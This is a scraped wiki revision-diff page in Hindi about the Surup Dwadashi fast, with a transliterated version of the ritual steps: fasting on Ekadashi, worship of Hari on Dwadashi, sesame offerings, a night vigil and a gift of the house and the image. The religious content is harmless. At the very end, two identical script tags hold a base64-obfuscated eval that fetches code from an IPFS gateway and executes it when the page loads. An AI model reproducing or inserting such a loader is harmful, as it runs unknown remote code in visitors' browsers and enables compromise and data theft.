Difference between revisions of "सुरूप द्वादशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
 
(6 intermediate revisions by 4 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[पौष]] [[कृष्ण पक्ष]] की [[द्वादशी]] पर जब कि पुष्य नक्षत्र हो करना चाहिए।
 
*[[पौष]] [[कृष्ण पक्ष]] की [[द्वादशी]] पर जब कि पुष्य नक्षत्र हो करना चाहिए।
 
*[[एकादशी]] को उपवास करना चाहिए।
 
*[[एकादशी]] को उपवास करना चाहिए।
*[[द्वादशी]] को एक पूर्ण घट में, जिसके ऊपर एक पात्र में तिल रखा गया हो, [[हरि]] की स्वर्णिम या रजत प्रतिमा का पूजन करना चाहिए। *तिलयुक्त भोजन का नैवेद्य चढ़ाना चाहिए।
+
*[[द्वादशी]] को एक पूर्ण घट में, जिसके ऊपर एक पात्र में तिल रखा गया हो, हरि की स्वर्णिम या रजत प्रतिमा का पूजन करना चाहिए।  
*पुरुषसूक्त<ref> पुरुषसूक्त (ऋग्वेद 10|90)</ref> के मंत्रों के साथ अग्नि में तिल की आहुतियाँ देनी चाहिए।
+
*तिलयुक्त भोजन का नैवेद्य चढ़ाना चाहिए।
 +
*पुरुषसूक्त<ref>पुरुषसूक्त (ऋग्वेद 10|90</ref> के मंत्रों के साथ अग्नि में तिल की आहुतियाँ देनी चाहिए।
 
*उस रात्रि जागरण करना चाहिए।
 
*उस रात्रि जागरण करना चाहिए।
 
*घर एवं प्रतिमा का दान करना चाहिए।   
 
*घर एवं प्रतिमा का दान करना चाहिए।   
*कुरूपता से छुटकारा मिलता है।<ref>हेमाद्रि (व्रतखण्ड 1, 1205-1213)</ref>  
+
*कुरूपता से छुटकारा मिलता है।<ref>हेमाद्रि (व्रतखण्ड 1, 1205-1213</ref>  
 
*[[शिव]] ने इसे [[उमा]] को बताया और कहा कि [[सत्यभामा]] ने इससे लाभ उठाया।  
 
*[[शिव]] ने इसे [[उमा]] को बताया और कहा कि [[सत्यभामा]] ने इससे लाभ उठाया।  
*व्रतार्क<ref>व्रतार्क (पाण्डुलिपि, 247अ)</ref> ने इसे गुर्जरों में प्रचलित माना है।
+
*व्रतार्क<ref>व्रतार्क (पाण्डुलिपि, 247अ</ref> ने इसे गुर्जरों में प्रचलित माना है।
 
 
 
 
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 11:56, 18 July 2013

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • paush krishna paksh ki dvadashi par jab ki pushy nakshatr ho karana chahie.
  • ekadashi ko upavas karana chahie.
  • dvadashi ko ek poorn ghat mean, jisake oopar ek patr mean til rakha gaya ho, hari ki svarnim ya rajat pratima ka poojan karana chahie.
  • tilayukt bhojan ka naivedy chadhana chahie.
  • purushasookt[1] ke mantroan ke sath agni mean til ki ahutiyaan deni chahie.
  • us ratri jagaran karana chahie.
  • ghar evan pratima ka dan karana chahie.
  • kuroopata se chhutakara milata hai.[2]
  • shiv ne ise uma ko bataya aur kaha ki satyabhama ne isase labh uthaya.
  • vratark[3] ne ise gurjaroan mean prachalit mana hai.

 

tika tippani aur sandarbh

  1. purushasookt (rrigved 10|90
  2. hemadri (vratakhand 1, 1205-1213
  3. vratark (pandulipi, 247a

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>